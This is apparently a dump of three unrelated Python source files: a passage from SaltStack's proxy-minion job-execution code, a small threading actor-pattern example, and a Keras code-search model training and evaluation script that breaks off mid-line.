'function': 'status.master', 'seconds': self.opts['master_alive_interval'], 'jid_include': True, 'maxrunning': 1, 'return_job': False, 'kwargs': {'master': self.opts['master'], 'connected': True} } }, persist=True) if self.opts['master_failback'] and \ 'master_list' in self.opts and \ self.opts['master'] != self.opts['master_list'][0]: self.schedule.add_job({ salt.minion.master_event(type='failback'): { 'function': 'status.ping_master', 'seconds': self.opts['master_failback_interval'], 'jid_include': True, 'maxrunning': 1, 'return_job': False, 'kwargs': {'master': self.opts['master_list'][0]} } }, persist=True) else: self.schedule.delete_job(salt.minion.master_event(type='failback'), persist=True) else: self.schedule.delete_job(salt.minion.master_event(type='alive', master=self.opts['master']), persist=True) self.schedule.delete_job(salt.minion.master_event(type='failback'), persist=True) # proxy keepalive proxy_alive_fn = fq_proxyname+'.alive' if (proxy_alive_fn in self.proxy and 'status.proxy_reconnect' in self.functions and self.opts.get('proxy_keep_alive', True)): # if `proxy_keep_alive` is either not specified, either set to False does not retry reconnecting self.schedule.add_job({ '__proxy_keepalive': { 'function': 'status.proxy_reconnect', 'minutes': self.opts.get('proxy_keep_alive_interval', 1), # by default, check once per minute 'jid_include': True, 'maxrunning': 1, 'return_job': False, 'kwargs': { 'proxy_name': fq_proxyname } } }, persist=True) self.schedule.enable_schedule() else: self.schedule.delete_job('__proxy_keepalive', persist=True) # Sync the grains here so the proxy can communicate them to the master self.functions['saltutil.sync_grains'](saltenv='base') self.grains_cache = self.opts['grains'] self.ready = True def target(cls, minion_instance, opts, data, connected): if not minion_instance: minion_instance = cls(opts) minion_instance.connected = connected if not hasattr(minion_instance, 'functions'): # Need to load the modules so they get all the dunder variables functions, returners, function_errors, executors = ( minion_instance._load_modules(grains=opts['grains']) ) minion_instance.functions = functions minion_instance.returners = returners minion_instance.function_errors = function_errors minion_instance.executors = executors # Pull in the utils minion_instance.utils = salt.loader.utils(minion_instance.opts) # Then load the proxy module minion_instance.proxy = salt.loader.proxy(minion_instance.opts, utils=minion_instance.utils) # And re-load the modules so the __proxy__ variable gets injected functions, returners, function_errors, executors = ( minion_instance._load_modules(grains=opts['grains']) ) minion_instance.functions = functions minion_instance.returners = returners minion_instance.function_errors = function_errors minion_instance.executors = executors minion_instance.functions.pack['__proxy__'] = minion_instance.proxy minion_instance.proxy.pack['__salt__'] = minion_instance.functions minion_instance.proxy.pack['__ret__'] = minion_instance.returners minion_instance.proxy.pack['__pillar__'] = minion_instance.opts['pillar'] # Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__ minion_instance.utils = salt.loader.utils(minion_instance.opts, proxy=minion_instance.proxy) minion_instance.proxy.pack['__utils__'] = minion_instance.utils # Reload all modules so all dunder variables are injected minion_instance.proxy.reload_modules() fq_proxyname = opts['proxy']['proxytype'] minion_instance.module_executors = minion_instance.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])() proxy_init_fn = minion_instance.proxy[fq_proxyname + '.init'] proxy_init_fn(opts) if not hasattr(minion_instance, 'serial'): minion_instance.serial = salt.payload.Serial(opts) if not hasattr(minion_instance, 'proc_dir'): uid = salt.utils.user.get_uid(user=opts.get('user', None)) minion_instance.proc_dir = ( salt.minion.get_proc_dir(opts['cachedir'], uid=uid) ) with tornado.stack_context.StackContext(minion_instance.ctx): if isinstance(data['fun'], tuple) or isinstance(data['fun'], list): ProxyMinion._thread_multi_return(minion_instance, opts, data) else: ProxyMinion._thread_return(minion_instance, opts, data) def thread_return(cls, minion_instance, opts, data): ''' This method should be used as a threading target, start the actual minion side execution. ''' fn_ = os.path.join(minion_instance.proc_dir, data['jid']) salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid'])) sdata = {'pid': os.getpid()} sdata.update(data) log.info('Starting a new job with PID %s', sdata['pid']) with salt.utils.files.fopen(fn_, 'w+b') as fp_: fp_.write(minion_instance.serial.dumps(sdata)) ret = {'success': False} function_name = data['fun'] executors = data.get('module_executors') or \ getattr(minion_instance, 'module_executors', []) or \ opts.get('module_executors', ['direct_call']) allow_missing_funcs = any([ minion_instance.executors['{0}.allow_missing_func'.format(executor)](function_name) for executor in executors if '{0}.allow_missing_func' in minion_instance.executors ]) if function_name in minion_instance.functions or allow_missing_funcs is True: try: minion_blackout_violation = False if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False): whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', []) # this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist: minion_blackout_violation = True # use minion_blackout_whitelist from grains if it exists if minion_instance.opts['grains'].get('minion_blackout', False): whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', []) if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist: minion_blackout_violation = True if minion_blackout_violation: raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' ' 'to False in pillar or grains to resume operations. Only ' 'saltutil.refresh_pillar allowed in blackout mode.') if function_name in minion_instance.functions: func = minion_instance.functions[function_name] args, kwargs = salt.minion.load_args_and_kwargs( func, data['arg'], data) else: # only run if function_name is not in minion_instance.functions and allow_missing_funcs is True func = function_name args, kwargs = data['arg'], data minion_instance.functions.pack['__context__']['retcode'] = 0 if isinstance(executors, six.string_types): executors = [executors] elif not isinstance(executors, list) or not executors: raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected". format(executors)) if opts.get('sudo_user', '') and executors[-1] != 'sudo': executors[-1] = 'sudo' # replace the last one with sudo log.trace('Executors list %s', executors) # pylint: disable=no-member for name in executors: fname = '{0}.execute'.format(name) if fname not in minion_instance.executors: raise SaltInvocationError("Executor '{0}' is not available".format(name)) return_data = minion_instance.executors[fname](opts, data, func, args, kwargs) if return_data is not None: break if isinstance(return_data, types.GeneratorType): ind = 0 iret = {} for single in return_data: if isinstance(single, dict) and isinstance(iret, dict): iret.update(single) else: if not iret: iret = [] iret.append(single) tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job') event_data = {'return': single} minion_instance._fire_master(event_data, tag) ind += 1 ret['return'] = iret else: ret['return'] = return_data retcode = minion_instance.functions.pack['__context__'].get( 'retcode', salt.defaults.exitcodes.EX_OK ) if retcode == salt.defaults.exitcodes.EX_OK: # No nonzero retcode in __context__ dunder. Check if return # is a dictionary with a "result" or "success" key. try: func_result = all(return_data.get(x, True) for x in ('result', 'success')) except Exception: # return data is not a dict func_result = True if not func_result: retcode = salt.defaults.exitcodes.EX_GENERIC ret['retcode'] = retcode ret['success'] = retcode == salt.defaults.exitcodes.EX_OK except CommandNotFoundError as exc: msg = 'Command required for \'{0}\' not found'.format( function_name ) log.debug(msg, exc_info=True) ret['return'] = '{0}: {1}'.format(msg, exc) ret['out'] = 'nested' ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC except CommandExecutionError as exc: log.error( 'A command in \'%s\' had a problem: %s', function_name, exc, exc_info_on_loglevel=logging.DEBUG ) ret['return'] = 'ERROR: {0}'.format(exc) ret['out'] = 'nested' ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC except SaltInvocationError as exc: log.error( 'Problem executing \'%s\': %s', function_name, exc, exc_info_on_loglevel=logging.DEBUG ) ret['return'] = 'ERROR executing \'{0}\': {1}'.format( function_name, exc ) ret['out'] = 'nested' ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC except TypeError as exc: msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format( function_name, exc, func.__doc__ or '' ) log.warning(msg, exc_info_on_loglevel=logging.DEBUG) ret['return'] = msg ret['out'] = 'nested' ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC except Exception: msg = 'The minion function caused an exception' log.warning(msg, exc_info_on_loglevel=True) salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data) ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc()) ret['out'] = 'nested' ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC else: docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name)) if docs: docs[function_name] = minion_instance.functions.missing_fun_string(function_name) ret['return'] = docs else: ret['return'] = minion_instance.functions.missing_fun_string(function_name) mod_name = function_name.split('.')[0] if mod_name in minion_instance.function_errors: ret['return'] += ' Possible reasons: \'{0}\''.format( minion_instance.function_errors[mod_name] ) ret['success'] = False ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC ret['out'] = 'nested' ret['jid'] = data['jid'] ret['fun'] = data['fun'] ret['fun_args'] = data['arg'] if 'master_id' in data: ret['master_id'] = data['master_id'] if 'metadata' in data: if isinstance(data['metadata'], dict): ret['metadata'] = data['metadata'] else: log.warning('The metadata parameter must be a dictionary. Ignoring.') if minion_instance.connected: minion_instance._return_pub( ret, timeout=minion_instance._return_retry_timer() ) # Add default returners from minion config # Should have been coverted to comma-delimited string already if isinstance(opts.get('return'), six.string_types): if data['ret']: data['ret'] = ','.join((data['ret'], opts['return'])) else: data['ret'] = opts['return'] log.debug('minion return: %s', ret) # TODO: make a list? Seems odd to split it this late :/ if data['ret'] and isinstance(data['ret'], six.string_types): if 'ret_config' in data: ret['ret_config'] = data['ret_config'] if 'ret_kwargs' in data: ret['ret_kwargs'] = data['ret_kwargs'] ret['id'] = opts['id'] for returner in set(data['ret'].split(',')): try: returner_str = '{0}.returner'.format(returner) if returner_str in minion_instance.returners: minion_instance.returners[returner_str](ret) else: returner_err = minion_instance.returners.missing_fun_string(returner_str) log.error( 'Returner %s could not be loaded: %s', returner_str, returner_err ) except Exception as exc: log.exception( 'The return failed for job %s: %s', data['jid'], exc ) def thread_multi_return(cls, minion_instance, opts, data): ''' This method should be used as a threading target, start the actual minion side execution. ''' fn_ = os.path.join(minion_instance.proc_dir, data['jid']) salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid'])) sdata = {'pid': os.getpid()} sdata.update(data) log.info('Starting a new job with PID %s', sdata['pid']) with salt.utils.files.fopen(fn_, 'w+b') as fp_: fp_.write(minion_instance.serial.dumps(sdata)) multifunc_ordered = opts.get('multifunc_ordered', False) num_funcs = len(data['fun']) if multifunc_ordered: ret = { 'return': [None] * num_funcs, 'retcode': [None] * num_funcs, 'success': [False] * num_funcs } else: ret = { 'return': {}, 'retcode': {}, 'success': {} } for ind in range(0, num_funcs): if not multifunc_ordered: ret['success'][data['fun'][ind]] = False try: minion_blackout_violation = False if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False): whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', []) # this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist: minion_blackout_violation = True elif minion_instance.opts['grains'].get('minion_blackout', False): whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', []) if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist: minion_blackout_violation = True if minion_blackout_violation: raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' ' 'to False in pillar or grains to resume operations. Only ' 'saltutil.refresh_pillar allowed in blackout mode.') func = minion_instance.functions[data['fun'][ind]] args, kwargs = salt.minion.load_args_and_kwargs( func, data['arg'][ind], data) minion_instance.functions.pack['__context__']['retcode'] = 0 key = ind if multifunc_ordered else data['fun'][ind] ret['return'][key] = func(*args, **kwargs) retcode = minion_instance.functions.pack['__context__'].get( 'retcode', 0 ) if retcode == 0: # No nonzero retcode in __context__ dunder. Check if return # is a dictionary with a "result" or "success" key. try: func_result = all(ret['return'][key].get(x, True) for x in ('result', 'success')) except Exception: # return data is not a dict func_result = True if not func_result: retcode = 1 ret['retcode'][key] = retcode ret['success'][key] = retcode == 0 except Exception as exc: trb = traceback.format_exc() log.warning('The minion function caused an exception: %s', exc) if multifunc_ordered: ret['return'][ind] = trb else: ret['return'][data['fun'][ind]] = trb ret['jid'] = data['jid'] ret['fun'] = data['fun'] ret['fun_args'] = data['arg'] if 'metadata' in data: ret['metadata'] = data['metadata'] if minion_instance.connected: minion_instance._return_pub( ret, timeout=minion_instance._return_retry_timer() ) if data['ret']: if 'ret_config' in data: ret['ret_config'] = data['ret_config'] if 'ret_kwargs' in data: ret['ret_kwargs'] = data['ret_kwargs'] for returner in set(data['ret'].split(',')): ret['id'] = opts['id'] try: minion_instance.returners['{0}.returner'.format( returner )](ret) except Exception as exc: log.error( 'The return failed for job %s: %s', data['jid'], exc ) def handle_payload(self, payload): if payload is not None and payload['enc'] == 'aes': if self._target_load(payload['load']): self._handle_decoded_payload(payload['load']) elif self.opts['zmq_filtering']: # In the filtering enabled case, we'd like to know when minion sees something it shouldnt log.trace( 'Broadcast message received not for this minion, Load: %s', payload['load'] ) # If it's not AES, and thus has not been verified, we do nothing. # In the future, we could add support for some clearfuncs, but # the minion currently has no need. def handle_decoded_payload(self, data): ''' Override this method if you wish to handle the decoded data differently. ''' # Ensure payload is unicode. Disregard failure to decode binary blobs. if six.PY2: data = salt.utils.data.decode(data, keep=True) if 'user' in data: log.info( 'User %s Executing command %s with jid %s', data['user'], data['fun'], data['jid'] ) else: log.info( 'Executing command %s with jid %s', data['fun'], data['jid'] ) log.debug('Command details %s', data) # Don't duplicate jobs log.trace('Started JIDs: %s', self.jid_queue) if self.jid_queue is not None: if data['jid'] in self.jid_queue: return else: self.jid_queue.append(data['jid']) if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']: self.jid_queue.pop(0) if isinstance(data['fun'], six.string_types): if data['fun'] == 'sys.reload_modules': self.functions, self.returners, self.function_errors, self.executors = self._load_modules() self.schedule.functions = self.functions self.schedule.returners = self.returners process_count_max = self.opts.get('process_count_max') if process_count_max > 0: process_count = len(salt.utils.minion.running(self.opts)) while process_count >= process_count_max: log.warning("Maximum number of processes reached while executing jid {0}, waiting...".format(data['jid'])) yield tornado.gen.sleep(10) process_count = len(salt.utils.minion.running(self.opts)) # We stash an instance references to allow for the socket # communication in Windows. You can't pickle functions, and thus # python needs to be able to reconstruct the reference on the other # side. instance = self multiprocessing_enabled = self.opts.get('multiprocessing', True) if multiprocessing_enabled: if sys.platform.startswith('win'): # let python reconstruct the minion on the other side if we're # running on windows instance = None with default_signals(signal.SIGINT, signal.SIGTERM): process = SignalHandlingProcess( target=self._target, args=(instance, self.opts, data, self.connected) ) else: process = threading.Thread( target=self._target, args=(instance, self.opts, data, self.connected), name=data['jid'] ) if multiprocessing_enabled: with default_signals(signal.SIGINT, signal.SIGTERM): # Reset current signals before starting the process in # order not to inherit the current signal handlers process.start() else: process.start() process.name = '{}-Job-{}'.format(process.name, data['jid']) self.subprocess_list.add(process) def target_load(self, load): # Verify that the publication is valid if 'tgt' not in load or 'jid' not in load or 'fun' not in load \ or 'arg' not in load: return False # Verify that the publication applies to this minion # It's important to note that the master does some pre-processing # to determine which minions to send a request to. So for example, # a "salt -G 'grain_key:grain_val' test.ping" will invoke some # pre-processing on the master and this minion should not see the # publication if the master does not determine that it should. if 'tgt_type' in load: match_func = self.matchers.get('{0}_match.match'.format(load['tgt_type']), None) if match_func is None: return False if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'): delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM) if not match_func(load['tgt'], delimiter=delimiter): return False elif not match_func(load['tgt']): return False else: if not self.matchers['glob_match.match'](load['tgt']): return False return True
threading_actor.py
#!/usr/bin/env python3 # -*- coding:utf-8 -*- # author: bigfoolliu """ 使用actor模式 - 一种古老但是简单的并行和分布式计算解决方案 - 一个actor就是一个计算任务. 简单的执行发送的消息任务 - actor之间的通信是单向和异步的 """ from queue import Queue from threading import Thread, Event # 用来关闭actor的 '哨兵' class ActorExit(Exception): pass class Actor: def __init__(self): self._mailbox = Queue() def send(self, msg): """发送消息到其他的actor""" self._mailbox.put(msg) def recv(self): """接收其他actor的msg""" msg = self._mailbox.get() if msg is ActorExit: raise ActorExit() return msg def start(self): """启动并发执行""" self._terminated = Event() t = Thread(target=self._bootstrap) t.daemon = True t.start() def close(self): """关闭actor""" self.send(ActorExit) def join(self): """阻塞""" self._terminated.wait() def _bootstrap(self): try: self.run() except ActorExit: pass finally: self._terminated.set() def run(self): """要由用户实现的run方法""" while True: msg = self.recv() # 任务实例 class PrintActor(Actor): def run(self): while True: msg = self.recv() print('get: ', msg) def main(): p = PrintActor() p.start() p.send('hello') p.send('actor') p.close() p.join() if __name__ == '__main__': main()
codesearcher.py
from __future__ import print_function import os import sys import random import traceback import pickle from keras.optimizers import RMSprop, Adam from scipy.stats import rankdata import math from math import log from models import * import argparse from datashape.coretypes import real random.seed(42) import threading import tables import configs import codecs import logging logger = logging.getLogger(__name__) logging.basicConfig(level=logging.INFO, format="%(asctime)s: %(name)s: %(levelname)s: %(message)s") from utils import cos_np, normalize,cos_np_for_normalized from configs import get_config from models import JointEmbeddingModel from parsePython import CodeVisitor from tables import * class Index(IsDescription): pos = UInt64Col() length = UInt16Col() class CodeSearcher: def __init__(self, conf=None): self.cv = CodeVisitor() self.py_path = "./data/pydata/" self.transfer_path = "./data/transfer/" self.py_codebase = self.load_pickle(self.py_path + "python_qid_to_code.pickle") #self.py_desc = self.load_pickle(self.py_path + "python_qid_to_title.pickle") self.py_use_codevec = self.py_path + "use_codevecs.h5" self.py_use_rawcode = self.py_path + "use_rawcode.pkl" self.py_use_token = self.py_path + "use_token.pkl" self.py_use_methname = self.py_path + "use_methname.pkl" self.py_use_apiseq = self.py_path + "use_apiseq.pkl" self.py_transferred_use_codevec = self.transfer_path + "py_transferred_use_codevec.h5" self.transfer_Xs_new = self.transfer_path + "transfer_Xs_new.h5" self.transfer_Xt_new = self.transfer_path + "transfer_Xt_new.h5" self.source_transferred_methnames = self.transfer_path + "source_transferred_methnames.h5" self.source_transferred_apiseqs = self.transfer_path + "source_transferred_apiseqs.h5" self.source_transferred_tokens = self.transfer_path + "source_transferred_tokens.h5" self.target_transferred_methnames = self.transfer_path + "target_transferred_methnames.h5" self.target_transferred_apiseqs = self.transfer_path + "target_transferred_apiseqs.h5" self.target_transferred_tokens = self.transfer_path + "target_transferred_tokens.h5" self.conf = dict() if conf is None else conf self.path = self.conf.get('workdir', '../data/github/codesearch/') self.train_params = conf.get('training_params', dict()) self.data_params=conf.get('data_params',dict()) self.model_params=conf.get('model_params',dict()) self.vocab_methname = self.load_pickle(self.path+self.data_params['vocab_methname']) self.vocab_apiseq=self.load_pickle(self.path+self.data_params['vocab_apiseq']) self.vocab_tokens=self.load_pickle(self.path+self.data_params['vocab_tokens']) self.vocab_desc=self.load_pickle(self.path+self.data_params['vocab_desc']) self._eval_sets = None self._code_reprs=None self._code_base=None self._code_base_chunksize=2000000 def load_pickle(self, filename): f = open(filename, 'rb') data = pickle.load(f) f.close() return data ##### Data Set ##### def load_pickle_data_chunk(self, filename, offset=0, chunk_size=-1): data = self.load_pickle(filename) size = len(data) if chunk_size < 0 or offset + chunk_size > size: return data return data[offset:offset+chunk_size] def load_transferred_training_chunk(self, offset, chunk_size): logger.debug('Loading a chunk of training data..') logger.debug('methname') chunk_methnames=self.load_hdf5(self.transferred_methnames,offset,chunk_size) logger.debug('apiseq') chunk_apiseqs=self.load_hdf5(self.transferred_apiseqs,offset,chunk_size) logger.debug('tokens') chunk_tokens=self.load_hdf5(self.transferred_tokens,offset,chunk_size) logger.debug('desc') chunk_descs=self.load_hdf5(self.path+self.data_params['train_desc'],offset,chunk_size) return chunk_methnames,chunk_apiseqs,chunk_tokens,chunk_descs def load_training_data_chunk(self,offset,chunk_size): logger.debug('Loading a chunk of training data..') logger.debug('methname') chunk_methnames=self.load_hdf5(self.path+self.data_params['train_methname'],offset,chunk_size) logger.debug('apiseq') chunk_apiseqs=self.load_hdf5(self.path+self.data_params['train_apiseq'],offset,chunk_size) logger.debug('tokens') chunk_tokens=self.load_hdf5(self.path+self.data_params['train_tokens'],offset,chunk_size) logger.debug('desc') chunk_descs=self.load_hdf5(self.path+self.data_params['train_desc'],offset,chunk_size) return chunk_methnames,chunk_apiseqs,chunk_tokens,chunk_descs def load_valid_data_chunk(self,chunk_size): logger.debug('Loading a chunk of validation data..') logger.debug('methname') chunk_methnames=self.load_hdf5(self.path+self.data_params['valid_methname'],0,chunk_size) logger.debug('apiseq') chunk_apiseqs=self.load_hdf5(self.path+self.data_params['valid_apiseq'],0,chunk_size) logger.debug('tokens') chunk_tokens=self.load_hdf5(self.path+self.data_params['valid_tokens'],0,chunk_size) logger.debug('desc') chunk_descs=self.load_hdf5(self.path+self.data_params['valid_desc'],0,chunk_size) return chunk_methnames,chunk_apiseqs,chunk_tokens,chunk_descs def load_use_data(self): logger.info('Loading use data..') logger.info('methname') methnames=self.load_hdf5(self.path+self.data_params['use_methname'],0,-1) #print(methnames) logger.info('apiseq') apiseqs=self.load_hdf5(self.path+self.data_params['use_apiseq'],0,-1) logger.info('tokens') tokens=self.load_hdf5(self.path+self.data_params['use_tokens'],0,-1) return methnames,apiseqs,tokens def load_codebase(self): """load codebase codefile: h5 file that stores raw code """ logger.info('Loading codebase (chunk size={})..'.format(self._code_base_chunksize)) if self._code_base==None: codebase=[] codes=codecs.open(self.path+self.data_params['use_codebase']).readlines() #use codecs to read in case of encoding problem for i in range(0,len(codes),self._code_base_chunksize): codebase.append(codes[i:i+self._code_base_chunksize]) self._code_base=codebase ### Results Data ### def load_code_reprs(self): logger.debug('Loading code vectors (chunk size={})..'.format(self._code_base_chunksize)) """reads vectors (2D numpy array) from a hdf5 file""" codereprs=[] h5f = tables.open_file(self.path+self.data_params['use_codevecs']) vecs= h5f.root.vecs for i in range(0,len(vecs),self._code_base_chunksize): codereprs.append(vecs[i:i+self._code_base_chunksize]) h5f.close() self._code_reprs=codereprs return self._code_reprs def save_code_reprs(self,vecs,filename): npvecs=np.array(vecs) fvec = tables.open_file(filename, 'w') atom = tables.Atom.from_dtype(npvecs.dtype) filters = tables.Filters(complib='blosc', complevel=5) ds = fvec.create_carray(fvec.root, 'vecs', atom, npvecs.shape,filters=filters) ds[:] = npvecs fvec.close() def load_hdf5(self,vecfile,start_offset,chunk_size): """reads training sentences(list of int array) from a hdf5 file""" table = tables.open_file(vecfile) data, index = (table.get_node('/phrases'),table.get_node('/indices')) data_len = index.shape[0] if chunk_size==-1:#if chunk_size is set to -1, then, load all data chunk_size=data_len start_offset = start_offset%data_len offset=start_offset logger.debug("{} entries".format(data_len)) logger.debug("starting from offset {} to {}".format(start_offset,start_offset+chunk_size)) sents = [] while offset < start_offset+chunk_size: if offset>=data_len: logger.warn('Warning: offset exceeds data length, starting from index 0..') chunk_size=start_offset+chunk_size-data_len start_offset=0 offset=0 len, pos = index[offset]['length'], index[offset]['pos'] offset += 1 sents.append(data[pos:pos + len].astype('float32')) table.close() return sents ##### Converting / reverting ##### def convert(self, vocab, words): """convert words into indices""" if type(words) == str: words = words.strip().lower().split(' ') return [vocab.get(w, 0) for w in words] def revert(self, vocab, indices): """revert indices into words""" ivocab = dict((v, k) for k, v in vocab.items()) return [ivocab.get(i, 'UNK') for i in indices] ##### Padding ##### def pad(self, data, len=None): from keras.preprocessing.sequence import pad_sequences return pad_sequences(data, maxlen=len, dtype="float32", padding='post', truncating='post', value=0) ##### Model Loading / saving ##### def save_model_epoch(self, model, epoch): if not os.path.exists(self.path+'models/'+self.model_params['model_name']+'/'): os.makedirs(self.path+'models/'+self.model_params['model_name']+'/') model.save("{}models/{}/epo{:d}_code.h5".format(self.path, self.model_params['model_name'], epoch), "{}models/{}/epo{:d}_desc.h5".format(self.path, self.model_params['model_name'], epoch), overwrite=True) def load_model_epoch(self, model, epoch): assert os.path.exists( "{}models/{}/epo{:d}_code.h5".format(self.path, self.model_params['model_name'], epoch))\ ,"Weights at epoch {:d} not found".format(epoch) assert os.path.exists( "{}models/{}/epo{:d}_desc.h5".format(self.path, self.model_params['model_name'], epoch))\ ,"Weights at epoch {:d} not found".format(epoch) model.load("{}models/{}/epo{:d}_code.h5".format(self.path, self.model_params['model_name'], epoch), "{}models/{}/epo{:d}_desc.h5".format(self.path, self.model_params['model_name'], epoch)) ##### Training ##### ''' There shouldn't be any negative number in input_x ''' def train(self, model, transfer=False): if self.train_params['reload']>0: self.load_model_epoch(model, self.train_params['reload']) valid_every = self.train_params.get('valid_every', None) save_every = self.train_params.get('save_every', None) batch_size = self.train_params.get('batch_size', 128) nb_epoch = self.train_params.get('nb_epoch', 10) split = self.train_params.get('validation_split', 0) val_loss = {'loss': 1., 'epoch': 0} logger.info("To run " + str(nb_epoch) + " times.") for i in range(self.train_params['reload']+1, nb_epoch): print('Epoch %d :: \n' % i, end='') chunk_methnames,chunk_apiseqs,chunk_tokens,chunk_descs = [],[],[],[] logger.debug('loading data chunk..') if transfer: chunk_methnames,chunk_apiseqs,chunk_tokens, chunk_descs = self.load_transferred_training_chunk(\ (i-1)*self.train_params.get('chunk_size', 100000),\ self.train_params.get('chunk_size', 100000)) else: chunk_methnames,chunk_apiseqs,chunk_tokens,chunk_descs =\ self.load_training_data_chunk(\ (i-1)*self.train_params.get('chunk_size', 100000),\ self.train_params.get('chunk_size', 100000)) logger.debug('padding data..') chunk_padded_methnames = self.pad(chunk_methnames, self.data_params['methname_len']) chunk_padded_apiseqs = self.pad(chunk_apiseqs, self.data_params['apiseq_len']) chunk_padded_tokens = self.pad(chunk_tokens, self.data_params['tokens_len']) chunk_padded_good_descs = self.pad(chunk_descs,self.data_params['desc_len']) chunk_bad_descs=[desc for desc in chunk_descs] random.shuffle(chunk_bad_descs) chunk_padded_bad_descs = self.pad(chunk_bad_descs, self.data_params['desc_len']) input_x = [chunk_padded_methnames,chunk_padded_apiseqs,chunk_padded_tokens, chunk_padded_good_descs, chunk_padded_bad_descs] #print(input_x) #return hist = model.fit(input_x, epochs=1, batch_size=batch_size, validation_split=split) if hist.history['val_loss'][0] < val_loss['loss']: val_loss = {'loss': hist.history['val_loss'][0], 'epoch': i} print('Best: Loss = {}, Epoch = {}'.format(val_loss['loss'], val_loss['epoch'])) if valid_every is not None and i % valid_every == 0: acc1,mrr = self.valid(model,1000,1) #acc,mrr,map,ndcg=self.eval(model, 1000, 1) if save_every is not None and i % save_every == 0: self.save_model_epoch(model, i) def valid(self, model, poolsize,K): """ quick validation in a code pool. param: poolsize - size of the code pool, if -1, load the whole test set """ #load test dataset if self._eval_sets is None: #self._eval_sets = dict([(s, self.load(s)) for s in ['dev', 'test1', 'test2']]) methnames,apiseqs,tokens,descs=self.load_valid_data_chunk(poolsize) self._eval_sets=dict() self._eval_sets['methnames']=methnames self._eval_sets['apiseqs']=apiseqs self._eval_sets['tokens']=tokens self._eval_sets['descs']=descs c_1, c_2 = 0, 0 data_len=len(self._eval_sets['descs']) for i in range(data_len): bad_descs=[desc for desc in self._eval_sets['descs']] random.shuffle(bad_descs) descs=bad_descs descs[0]=self._eval_sets['descs'][i]#good desc descs=self.pad(descs,self.data_params['desc_len']) methnames=self.pad([self._eval_sets['methnames'][i]]*data_len,self.data_params['methname_len']) apiseqs=self.pad([self._eval_sets['apiseqs'][i]]*data_len,self.data_params['apiseq_len']) tokens=self.pad([self._eval_sets['tokens'][i]]*data_len,self.data_params['tokens_len']) n_good = K sims = model.predict([methnames, apiseqs,tokens, descs], batch_size=data_len).flatten() r = rankdata(sims, method='max') max_r = np.argmax(r) max_n = np.argmax(r[:n_good]) c_1 += 1 if max_r == max_n else 0 c_2 += 1 / float(r[max_r] - r[max_n] + 1) top1 = c_1 / float(data_len) #percentage of predicted most similar desc that is really the corresponding desc mrr = c_2 / float(data_len) logger.info('Top-1 Precision={}, MRR={}'.format(top1,mrr)) return top1, mrr ##### Evaluation in the develop set ##### def eval(self, model, poolsize, K): """ validate in a code pool. param: poolsize - size of the code pool, if -1, load the whole test set """ def ACC(real,predict): sum=0.0 for val in real: try: index=predict.index(val) except ValueError: index=-1 if index!=-1: sum=sum+1 return sum/float(len(real)) def MAP(real,predict): sum=0.0 for id,val in enumerate(real): try: index=predict.index(val) except ValueError: index=-1 if index!=-1: sum=sum+(id+1)/float(index+1) return sum/float(len(real)) def MRR(real,predict): sum=0.0 for val in real: try: index=predict.index(val) except ValueError: index=-1 if index!=-1: sum=sum+1.0/float(index+1) return sum/float(len(real)) def NDCG(real,predict): dcg=0.0 idcg=IDCG(len(real)) for i,predictItem in enumerate(predict): if predictItem in real: itemRelevance=1 rank = i+1 dcg+=(math.pow(2,itemRelevance)-1.0)*(math.log(2)/math.log(rank+1)) return dcg/float(idcg) def IDCG(n): idcg=0 itemRelevance=1 for i in range(n): idcg+=(math.pow(2,itemRelevance)-1.0)*(math.log(2)/math.log(i+2)) return idcg #load valid dataset if self._eval_sets is None: methnames,apiseqs,tokens,descs=self.load_valid_data_chunk(poolsize) self._eval_sets=dict() self._eval_sets['methnames']=methnames self._eval_sets['apiseqs']=apiseqs self._eval_sets['tokens']=tokens self._eval_sets['descs']=descs acc,mrr,map,ndcg=0,0,0,0 data_len=len(self._eval_sets['descs']) for i in range(data_len): print(i) desc=self._eval_sets['descs'][i]#good desc descs=self.pad([desc]*data_len,self.data_params['desc_len']) methnames=self.pad(self._eval_sets['methnames'],self.data_params['methname_len']) apiseqs=self.pad(self._eval_sets['apiseqs'],self.data_params['apiseq_len']) tokens=self.pad(self._eval_sets['tokens'],self.data_params['tokens_len']) n_results = K sims = model.predict([methnames, apiseqs,tokens, descs], batch_size=data_len).flatten() negsims=np.negative(sims) predict=np.argsort(negsims)#predict = np.argpartition(negsims, kth=n_results-1) predict = predict[:n_results] predict = [int(k) for k in predict] real=[i] acc+=ACC(real,predict) mrr+=MRR(real,predict) map+=MAP(real,predict) ndcg+=NDCG(real,predict) acc = acc / float(data_len) mrr = mrr / float(data_len) map = map / float(data_len) ndcg= ndcg/ float(data_len) logger.info('ACC={}, MRR={}, 